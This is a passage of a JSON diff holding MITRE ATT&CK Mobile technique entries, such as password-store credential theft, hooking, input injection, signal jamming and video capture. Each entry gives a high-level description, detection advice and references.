"x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T15:45:44.103Z", + "name": "Credentials from Password Store", + "description": "Adversaries may search common password storage locations to obtain user credentials. Passwords can be stored in several places on a device, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can potentially detect jailbroken devices. Application vetting services may be able to detect known privilege escalation exploits contained within applications, as well as searching application packages for strings that correlate to known password store locations.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "created": "2022-04-01T14:55:10.494Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1634", + "external_id": "T1634" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html", + "external_id": "AUT-11" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Hooking", + "description": "Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection. Hooking can be used to modify return values or data structures of system APIs and function calls. This process typically involves using 3rd party root frameworks, such as Xposed or Magisk, with either a system exploit or pre-existing root access. By including custom modules for root frameworks, adversaries can hook system APIs and alter the return value and/or system data structures to alter functionality/visibility of various aspects of the system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "Hooking can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Jörg Abraham, EclecticIQ" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--ccde43e4-78f9-4f32-b401-c081e7db71ea", + "created": "2021-09-24T14:47:34.182Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1617", + "external_id": "T1617" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--cde2cb84-455e-410c-8aa9-086f2788bcd2", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1478", + "url": "https://attack.mitre.org/techniques/T1478" + }, + { + "source_name": "Talos-MDM", + "url": "https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html", + "description": "Warren Mercer, Paul Rascagneres, Andrew Williams. (2018, July 12). Advanced Mobile Malware Campaign in India uses Malicious MDM. Retrieved September 24, 2018." + }, + { + "source_name": "Symantec-iOSProfile", + "url": "https://www.symantec.com/connect/blogs/malicious-profiles-sleeping-giant-ios-security", + "description": "Yair Amit. (2013, March 12). Malicious Profiles – The Sleeping Giant of iOS Security. Retrieved September 24, 2018." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-7" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could attempt to install insecure or malicious configuration settings on the mobile device, through means such as phishing emails or text messages either directly containing the configuration settings as an attachment, or containing a web link to the configuration settings. The device user may be tricked into installing the configuration settings through social engineering techniques (Citation: Symantec-iOSProfile).\n\nFor example, an unwanted Certification Authority (CA) certificate could be placed in the device's trusted certificate store, increasing the device's susceptibility to adversary-in-the-middle network attacks seeking to eavesdrop on or manipulate the device's network communication ([Eavesdrop on Insecure Network Communication](https://attack.mitre.org/techniques/T1439) and [Manipulate Device Communication](https://attack.mitre.org/techniques/T1463)).\n\nOn iOS, malicious Configuration Profiles could contain unwanted Certification Authority (CA) certificates or other insecure settings such as unwanted proxy server or VPN settings to route the device's network traffic through an adversary's system. The device could also potentially be enrolled into a malicious Mobile Device Management (MDM) system (Citation: Talos-MDM).", + "modified": "2022-03-30T18:18:15.903Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Install Insecure or Malicious Configuration", + "x_mitre_detection": "On Android, the user can view trusted CA certificates through the device settings and look for unexpected certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies.\n\nOn iOS, the user can view installed Configuration Profiles through the device settings and look for unexpected profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + }, + { + "phase_name": "initial-access", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:53:35.087Z", + "name": "File and Directory Discovery", + "description": "Adversaries may enumerate files and directories or search in specific device locations for desired information within a filesystem. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) during automated discovery to shape follow-on behaviors, including deciding if the adversary should fully infect the target and/or attempt specific actions. \n\nOn Android, Linux file permissions and SELinux policies typically stringently restrict what can be accessed by apps without taking advantage of a privilege escalation exploit. The contents of the external storage directory are generally visible, which could present concerns if sensitive data is inappropriately stored there. iOS's security architecture generally restricts the ability to perform any type of [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) without use of escalated privileges. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users are presented with a permissions popup when an application requests access to external device storage.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "created": "2017-10-25T14:48:21.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1420", + "external_id": "T1420" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html", + "external_id": "STA-41" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "created": "2017-10-25T14:48:32.328Z", + "x_mitre_version": "3.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1406", + "url": "https://attack.mitre.org/techniques/T1406" + }, + { + "source_name": "Microsoft MalLockerB", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-21" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n \nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Portions of files can also be encoded to hide the plaintext strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.(Citation: Microsoft MalLockerB) ", + "modified": "2022-04-06T12:36:31.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscated Files or Information", + "x_mitre_detection": "Dynamic analysis, when used in application vetting, may in some cases be able to identify malicious code in obfuscated or encrypted form by detecting the code at execution time (after it is deobfuscated or decrypted). Some application vetting techniques apply reputation analysis of the application developer and can alert to potentially suspicious applications without actual examination of application code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Input Injection", + "description": "A malicious application can inject input to the user interface to mimic user interaction through the abuse of Android's accessibility APIs.\n\n[Input Injection](https://attack.mitre.org/techniques/T1516) can be achieved using any of the following methods:\n\n* Mimicking user clicks on the screen, for example to steal money from a user's PayPal account.(Citation: android-trojan-steals-paypal-2fa)\n* Injecting global actions, such as `GLOBAL_ACTION_BACK` (programatically mimicking a physical back button press), to trigger actions on behalf of the user.(Citation: Talos Gustuff Apr 2019)\n* Inserting input into text fields on behalf of the user. This method is used legitimately to auto-fill text fields by applications such as password managers.(Citation: bitwarden autofill logins)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "Users can view applications that have registered accessibility services in the accessibility menu within the device settings.", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Lukáš Štefanko, ESET" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "created": "2019-09-15T15:26:22.356Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1516", + "external_id": "T1516" + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "description": "Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/" + }, + { + "source_name": "Talos Gustuff Apr 2019", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" + }, + { + "source_name": "bitwarden autofill logins", + "description": "Bitwarden. (n.d.). Auto-fill logins on Android . Retrieved September 15, 2019.", + "url": "https://help.bitwarden.com/article/auto-fill-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:51:23.109Z", + "name": "Network Denial of Service", + "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth that services rely on, or by jamming the signal going to or coming from devices. \n\nA Network DoS will occur when an adversary is able to jam radio signals (e.g. Wi-Fi, cellular, GPS) around a device to prevent it from communicating. For example, to jam cellular signal, an adversary may use a handheld signal jammer, which jam devices within the jammer’s operational range.(Citation: NIST-SP800187) \n\nUsage of cellular jamming has been documented in several arrests reported in the news.(Citation: CNET-Celljammer)(Citation: NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Unexpected loss of radio signal could indicate that a device is being actively jammed.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.3", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d2e112dc-f6d4-488d-b8df-ecbfb57a0a2d", + "created": "2017-10-25T14:48:25.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1464", + "external_id": "T1464" + }, + { + "source_name": "CNET-Celljammer", + "description": "Chris Matyszczyk. (2014, May 1). FCC: Man used device to jam drivers' cell phone calls. Retrieved November 8, 2018.", + "url": "https://www.cnet.com/news/man-put-cell-phone-jammer-in-car-to-stop-driver-calls-fcc-says/" + }, + { + "source_name": "Arstechnica-Celljam", + "description": "David Kravets. (2016, March 10). Man accused of jamming passengers’ cell phones on Chicago subway. Retrieved November 8, 2018.", + "url": "https://arstechnica.com/tech-policy/2016/03/man-accused-of-jamming-passengers-cell-phones-on-chicago-subway/" + }, + { + "source_name": "NIST-SP800187", + "description": "Jeffrey Cichonski, Joshua M Franklin, Michael Bartock. (2017, December). Guide to LTE Security. Retrieved January 20, 2017.", + "url": "http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf" + }, + { + "source_name": "NYTimes-Celljam", + "description": "Matt Richtel. (2007, November 4). Devices Enforce Silence of Cellphones, Illegally. Retrieved November 8, 2018.", + "url": "https://www.nytimes.com/2007/11/04/technology/04jammer.html" + }, + { + "source_name": "Digitaltrends-Celljam", + "description": "Trevor Mogg. (2015, June 5). Florida teacher punished after signal-jamming his students’ cell phones. Retrieved November 8, 2018.", + "url": "https://www.digitaltrends.com/mobile/florida-teacher-punished-after-signal-jamming-his-students-cell-phones/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html", + "external_id": "CEL-7" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-8.html", + "external_id": "CEL-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-5.html", + "external_id": "LPN-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/gps-threats/GPS-0.html", + "external_id": "GPS-0" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Compromise Application Executable", + "description": "Adversaries may modify applications installed on a device to establish persistent access to a victim. These malicious modifications can be used to make legitimate applications carry out adversary tasks when these applications are in use.\n\nThere are multiple ways an adversary can inject malicious code into applications. One method is by taking advantages of device vulnerabilities, the most well-known being Janus, an Android vulnerability that allows adversaries to add extra bytes to APK (application) and DEX (executable) files without affecting the file's signature. By being able to add arbitrary bytes to valid applications, attackers can seamlessly inject code into genuine executables without the user's knowledge.(Citation: Guardsquare Janus)\n\nAdversaries may also rebuild applications to include malicious modifications. This can be achieved by decompiling the genuine application, merging it with the malicious code, and recompiling it.(Citation: CheckPoint Agent Smith)\n\nAdversaries may also take action to conceal modifications to application executables and bypass user consent. These actions include altering modifications to appear as an update or exploiting vulnerabilities that allow activities of the malicious application to run inside a system application.(Citation: CheckPoint Agent Smith)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "This behavior is seamless to the user and is typically undetectable.", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "created": "2020-05-07T15:24:49.068Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1577", + "external_id": "T1577" + }, + { + "source_name": "Guardsquare Janus", + "description": "Guarsquare. (2017, November 13). New Android vulnerability allows attackers to modify apps without affecting their signatures. Retrieved May 7, 2020.", + "url": "https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures" + }, + { + "source_name": "CheckPoint Agent Smith", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020.", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:43:46.177Z", + "name": "Event Triggered Execution", + "description": "Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities. \n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via automatically and repeatedly executing malicious code. After gaining access to a victim’s system, adversaries may create or modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can detect which broadcast intents an application registers for and which permissions it requests. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d446b9f0-06a9-4a8d-97ee-298cfee84f14", + "created": "2022-03-30T14:25:41.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1624", + "external_id": "T1624" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:50:32.697Z", + "name": "System Network Configuration Discovery", + "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of operating systems they access or through information discovery of remote systems. \n\n \n\nOn Android, details of onboard network interfaces are accessible to apps through the `java.net.NetworkInterface` class.(Citation: NetworkInterface) Previously, the Android `TelephonyManager` class could be used to gather telephony-related device identifiers, information such as the IMSI, IMEI, and phone number. However, starting with Android 10, only preloaded, carrier, the default SMS, or device and profile owner applications can access the telephony-related device identifiers.(Citation: TelephonyManager) \n\n \n\nOn iOS, gathering network configuration information is not possible without root access. \n\n \n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for usage of the `READ_PRIVILEGED_PHONE_STATE` Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.3", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "created": "2017-10-25T14:48:32.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1422", + "external_id": "T1422" + }, + { + "source_name": "NetworkInterface", + "description": "Android. (n.d.). NetworkInterface. Retrieved December 21, 2016.", + "url": "https://developer.android.com/reference/java/net/NetworkInterface.html" + }, + { + "source_name": "TelephonyManager", + "description": "Android. (n.d.). TelephonyManager. Retrieved December 21, 2016.", + "url": "https://developer.android.com/reference/android/telephony/TelephonyManager.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63", + "created": "2017-10-25T14:48:25.322Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1463", + "url": "https://attack.mitre.org/techniques/T1463" + }, + { + "source_name": "FireEye-SSL", + "url": "https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html", + "description": "Adrian Mettler, Yulong Zhang, Vishwanath Raman. (2014, August 20). SSL VULNERABILITIES: WHO LISTENS WHEN ANDROID APPLICATIONS TALK?. Retrieved December 24, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-1" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to adversary-in-the-middle attacks (Citation: FireEye-SSL).", + "modified": "2022-04-06T15:44:48.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Manipulate Device Communication", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:38:27.848Z", + "name": "Video Capture", + "description": "An adversary can leverage a device’s cameras to gather information by capturing video recordings. Images may also be captured, potentially in specified intervals, in lieu of video files. \n\n \n\nMalware or scripts may interact with the device cameras through an available API provided by the operating system. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1513) due to use of the device’s cameras for video recording rather than capturing the victim’s screen. \n\n \n\nIn Android, an application must hold the `android.permission.CAMERA` permission to access the cameras. In iOS, applications must include the `NSCameraUsageDescription` key in the `Info.plist` file. In both cases, the user must grant permission to the requesting application to use the camera. If the device has been rooted or jailbroken, an adversary may be able to access the camera without knowledge of the user. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can view which applications have permission to use the camera through the device settings screen, where the user can then choose to revoke the permissions. During the vetting process, applications using the Android permission `android.permission.CAMERA`, or the iOS `NSCameraUsageDescription` plist entry could be given closer scrutiny. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "created": "2019-08-09T16:14:58.254Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1512", + "external_id": "T1512" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html", + "external_id": "APP-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:53:34.118Z", + "name": "One-Way Communication", + "description": "Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to a compromised system without receiving return output. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response. \n\n \n\nPopular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d916f176-a1ca-4a78-9fdd-4058bc28162e", + "created": "2022-04-06T15:52:07.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1481/003", + "external_id": "T1481.003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--d9db3d46-66ca-44b4-9daa-1ef97cb7465a", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1475", + "url": "https://attack.mitre.org/techniques/T1475" + }, + { + "source_name": "Oberheide-Bouncer", + "url": "https://jon.oberheide.org/files/summercon12-bouncer.pdf", + "description": "Jon Oberheide and Charlie Miller. (2012). Dissecting the Android Bouncer. Retrieved December 12, 2016." + }, + { + "source_name": "Oberheide-RemoteInstall", + "url": "https://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/", + "description": "Jon Oberheide. (2010, June 25). Remote Kill and Install on Google Android. Retrieved December 12, 2016." + }, + { + "source_name": "Percoco-Bouncer", + "url": "https://media.blackhat.com/bh-us-12/Briefings/Percoco/BH_US_12_Percoco_Adventures_in_Bouncerland_WP.pdf", + "description": "Nicholas 